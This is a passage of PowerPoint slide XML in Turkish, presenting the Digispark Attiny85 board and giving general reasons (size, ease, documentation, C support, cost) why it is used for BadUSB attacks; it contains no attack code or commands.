          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Digispark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Attiny85 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D739968-3FEB-4111-BD3D-F1DD57003AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="1935921"/>
            <a:ext cx="6282872" cy="4515679"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bir Kickstarter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>projesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>başlayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>digispark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Arduino IDE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Arduino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programlanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliştirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kartıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. BADUSB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleştirilirken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Attiny85 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikrodenetleyicinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tercih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilmesinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sebepleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birkaç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>özelliğiyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açıklanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Boyut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ailedeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>denetleyiciler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücülerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görünümünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>oluşturmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yeterince</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>küçüktür</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kolaylık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Halihazırda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aracılığıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uyarlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Attiny85 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>modülü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliştirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>adımlarından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geçmeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>oluşturulmasına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>verir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dokümantasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>denetleyici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>serisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üreticisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Atmel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geliştiricilerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ürünlerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yararlanabilmeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerekli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belgeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sunar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>denetleyici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kodunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>derlenmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>verir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>prosedürel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programlamayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öğretmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yaygın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıldığından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>topluluğa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tercih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sebebidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Maliyet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ucuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bileşendir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
